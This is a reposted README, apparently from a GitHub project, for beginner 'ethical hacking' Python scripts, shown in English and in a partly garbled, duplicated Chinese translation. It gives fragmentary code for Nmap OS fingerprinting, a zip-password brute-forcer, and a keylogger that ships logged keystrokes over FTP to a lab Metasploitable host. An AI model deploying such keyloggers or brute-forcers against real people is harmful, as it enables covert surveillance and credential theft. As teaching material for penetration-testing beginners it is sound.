基于区块链的毕业设计Ethical Hacking with Python – 用Python进行道德黑客攻击

本文提供基于区块链的毕业设计国外最新区块链项目源码下载,包括solidity,eth,fabric等blockchain区块链,基于区块链的毕业设计Ethical Hacking with Python – 用Python进行道德黑客攻击 是一篇很好的国外资料

Ethical Hacking with Python

Ethical Hacking refers to the process of performing attacks on computer systems and networks to discover potential security weaknesses and help clients improve their security. It is common for ethical hackers to automate structured processes by writing their own scripts.

Python is a widely-used general-purpose, open-source, object-oriented HLL with libraries that can be used for hacking, making it ideal for implementing automation. Python’s large community makes doubt resolution fast and easy.

This repository contains python3 scripts for automating basic tasks such as OS fingerprinting, keylogging, and brute-forcing protected passwords. All instructions regarding customization have been provided in the scripts themselves.

OS Fingerprinting

OS fingerprinting is the process of determining the operating system running on a system. By determining the OS of a system, tailor-made attacks can be launched against the target using known vulnerabilities.

In this script, the python3-nmap library has been used to bring the functionalities of Nmap to Python. Nmap is an open-source security auditing and network mapping tool that can “detect or diagnose services that are running on an Internet-connected system by a network administrator in their networked system”. For more information, visit

https://nmap.org/book/osdetect-fingerprint-format.html

Installation

pip install python3-nmap

Usage

import nmap    # import the nmap module import sys     # import the sys module import time    # import the time module  nm_scan = nmap.PortScanner() # initialise the Nmap PortScanner object for scanning nm_scanner= nm_scan.scan(sys.argv[1],'80',arguments='-O')    # scan port 80 of target IP obtained using sys.argv[1] with open("%s.txt"%sys.argv[1], 'w') as f:     f.write(host_status+port_status+scan_method+os_guess)     f.write("nReport generated at: "+time.strftime("%Y-%m-%d_%H:%M:%S GMT", time.gmtime())) # generate timestamp

To run the script, open a terminal in the current directory and enter

python os_fingerprint.py <target IP>

Here, will be replaced by your target’s IP address, and utilized as sys.argv[1] in the script. Before running the script, update the Environment Variables on your system

Keylogging

Keystroke loggers, or keyloggers, are pieces of software that can log (and thus, track) the keys being pressed on a keyboard, in order to monitor the actions of the target.

In this script, pynput.keyboard, ftplib and logging modules of Python have been used to create a keylogger, store its results, and integrate FTP into it. No additional installations are required, as these modules are built-in.

The pynput package can control and monitor input devices, as explained on

https://pynput.readthedocs.io/en/latest/keyboard.html

File Transfer Protocol (FTP) is an internet protocol provided by TCP/IP used for transmitting files from one host to another. The ftplib module is used to implement the client side of the FTP protocol. For more information, visit

https://docs.python.org/3/library/ftplib.html

The logging module allows writing status messages to output streams such as files. Read about it on

https://docs.python.org/3/library/logging.html

Usage

from pynput.keyboard import Key, Listener   # import Key and Listener modules from pynput.keyboard package import ftplib                               # import the ftplib module import logging                              # import the logging module  def onKeyPress(Key):     try:         logging.info(str(Key)) # creates a definition for keypresses and takes the key as a parameter  sess= ftplib.FTP("", "", "")    # creates a new instance of the FTP class and makes a connection when host is provided                                 # insert target IP, username, password

In this script, a metasploitable machine is used as the FTP server where the file with the pressed keys exist. The IP address of the machine needs to be the same as the address in the script. To setup a metasploitable machine, follow this tutorial:

https://www.thesecuritygeeks.com/security/install-metasploitable-2-in-virtual-box/

The default username and password are “msfadmin”. The machine’s IP address can be found out by running the “ifconfig” command on it. Make sure your virtual machine is online before running this script on your local machine.

After the script has finished running, run the “ls -a” command on the virtual machine to check if the keylogger results have been shared with it or not. The original .txt file will be in the same directory as the script, on your local machine, and its copy should be present in the metasploitable machine.

Bruteforce Protected Passwords

Bruteforcing is the process of attacking static parameters with several parameters to compare and match. Here, the parameter will be a protected password. This script uses the zipfile and argparse python modules for this process.

The zipfile module facilitates the creating, extracting, reading and writing to ZIP archives. The ZipFile() function returns a string or file object. For details, visit

https://docs.python.org/3/library/zipfile.html

The argparse module improves interaction by generating help, usage and error messages according to command-line arguments entered by the user. To see how this works, check

https://docs.python.org/3/library/argparse.html

Usage

from zipfile import ZipFile  # import the ZipFile module import argparse              # import the argparse module  parser= argparse.ArgumentParser(description="nUsage: python <brutefile.py> -z <zipfile.zip> -p <passwordfile.txt>") parser.add_argument("-z", dest="ziparchive", help="Zip archive file") parser.add_argument("-p", dest="passfile", help="Password file") parsed_args= parser.parse_args() ziparchive= ZipFile(parsed_args.ziparchive)  # Replace <brutefile.py> with the program name, <zipfile.py> with the target and <passwordfile.txt> with the list of passwords  # -z and -p are arguments for ZipFile()

Contributing

Pull requests are welcome and encouraged. As this repository is for scripting and ethical hacking beginners, please explore further and improve the functionalities of these scripts as desired. Try writing new scripts for automating other penetration testing tasks as well.


使用Python进行道德黑客攻击

道德黑客攻击是指对计算机系统和网络进行攻击,以发现潜在的安全弱点并帮助客户提高其安全性的过程。道德黑客通过编写自己的脚本来自动化结构化流程是很常见的。

Python是一个广泛使用的通用的、开源的、面向对象的HLL,具有可用于黑客攻击的库,是实现自动化的理想选择。Python的大型社区使疑问的解决变得既快又容易。

此存储库包含python3脚本,用于自动执行基本任务,如操作系统指纹识别、密钥记录和暴力强制保护的密码。所有关于定制的说明都在脚本中提供。

OS Fingerprinting

OS指纹是确定系统上运行的操作系统的过程。通过确定系统的操作系统,可以使用已知的漏洞对目标发起定制的攻击。

在这个脚本中,python3nmap库用于将nmap的功能引入Python。Nmap是一个开源的安全审计和网络映射工具,它可以“检测或诊断由网络系统中的网络管理员在连接到Internet的系统上运行的服务”。有关详细信息,请访问

https://nmap.org/book/osdetect-fingerprint-format.html

Installation

pip install python3-nmap

Usage

import nmap    # import the nmap module import sys     # import the sys module import time    # import the time module  nm_scan = nmap.PortScanner() # initialise the Nmap PortScanner object for scanning nm_scanner= nm_scan.scan(sys.argv[1],'80',arguments='-O')    # scan port 80 of target IP obtained using sys.argv[1] with open("%s.txt"%sys.argv[1], 'w') as f:     f.write(host_status+port_status+scan_method+os_guess)     f.write("nReport generated at: "+time.strftime("%Y-%m-%d_%H:%M:%S GMT", time.gmtime())) # generate timestamp

要运行脚本,请在当前目录中打开一个终端并在此处输入

python os_fingerprint.py <target IP>

,将被目标的IP地址替换,并作为系统argv[1] 在剧本里。在运行脚本之前,请更新系统上的环境变量

Keylogging

击键记录程序(keytrokeloggers)是一种软件,可以记录(并跟踪)键盘上按下的键,以便监视目标的操作。

在这个脚本中,pynput.键盘ftplib和Python的日志模块被用来创建一个键盘记录器,存储其结果,并将FTP集成到其中。无需额外安装,因为这些模块是内置的。输入和控制装置https://pynput.readthedocs.io/en/latest/keyboard.html文件传输协议(FTP)是由TCP/IP提供的一种internet协议,用于将文件从一台主机传输到另一台主机。ftplib模块用于实现FTP协议的客户端。有关详细信息,请访问

https://docs.python.org/3/library/ftplib.html

日志模块允许向输出流(如文件)写入状态消息。请在

https://docs.python.org/3/library/logging.html

在这个脚本中,metasploitable计算机被用作FTP服务器,其中存在具有按下键的文件。机器的IP地址需要与脚本中的地址相同。要设置metasploitable计算机,请遵循以下教程:

https://www.thesecuritygeeks.com/security/install-metasploitable-2-in-virtual-box/

默认用户名和密码为“msfadmin”。通过运行“ifconfig”命令可以找到机器的IP地址。在本地计算机上运行此脚本之前,请确保虚拟机处于联机状态。

Usage

from pynput.keyboard import Key, Listener   # import Key and Listener modules from pynput.keyboard package import ftplib                               # import the ftplib module import logging                              # import the logging module  def onKeyPress(Key):     try:         logging.info(str(Key)) # creates a definition for keypresses and takes the key as a parameter  sess= ftplib.FTP("", "", "")    # creates a new instance of the FTP class and makes a connection when host is provided                                 # insert target IP, username, password

脚本运行完毕后,在虚拟机上运行“ls-a”命令,检查是否已与虚拟机共享键盘记录器结果。原始的.txt文件将与脚本位于本地计算机上的同一目录中,其副本应存在于metasploitable计算机中。

暴力攻击是用多个参数进行比较和匹配来攻击静态参数的过程。在这里,参数将是一个受保护的密码。此脚本将zipfile和argparse python模块用于此进程。

zipfile模块便于创建、提取、读取和写入ZIP归档文件。函数的作用是:返回字符串或文件对象。有关详细信息,请访问

https://docs.python.org/3/library/zipfile.html

Bruteforce Protected Passwords

argparse模块通过根据用户输入的命令行参数生成帮助、用法和错误消息来改进交互。要了解这是如何工作的,请检查

https://docs.python.org/3/library/argparse.html

欢迎并鼓励拉取请求。由于这个资料库是为脚本和道德黑客初学者,请进一步探索和改进这些脚本的功能,如有需要。尝试编写新的脚本来自动化其他渗透测试任务。

The argparse module improves interaction by generating help, usage and error messages according to command-line arguments entered by the user. To see how this works, check

https://docs.python.org/3/library/argparse.html

Usage

from zipfile import ZipFile  # import the ZipFile module import argparse              # import the argparse module  parser= argparse.ArgumentParser(description="nUsage: python <brutefile.py> -z <zipfile.zip> -p <passwordfile.txt>") parser.add_argument("-z", dest="ziparchive", help="Zip archive file") parser.add_argument("-p", dest="passfile", help="Password file") parsed_args= parser.parse_args() ziparchive= ZipFile(parsed_args.ziparchive)  # Replace <brutefile.py> with the program name, <zipfile.py> with the target and <passwordfile.txt> with the list of passwords  # -z and -p are arguments for ZipFile()

Contributing

Pull requests are welcome and encouraged. As this repository is for scripting and ethical hacking beginners, please explore further and improve the functionalities of these scripts as desired. Try writing new scripts for automating other penetration testing tasks as well.

部分转自网络,侵权联系删除区块链源码网

www.interchains.cc

https://www.interchains.cc/19311.html

区块链毕设网(www.interchains.cc)全网最靠谱的原创区块链毕设代做网站 部分资料来自网络,侵权联系删除! 最全最大的区块链源码站 !
区块链知识分享网, 以太坊dapp资源网, 区块链教程, fabric教程下载, 区块链书籍下载, 区块链资料下载, 区块链视频教程下载, 区块链基础教程, 区块链入门教程, 区块链资源 » 基于区块链的毕业设计Ethical Hacking with Python – 用Python进行道德黑客攻击

提供最优质的资源集合

立即查看 了解详情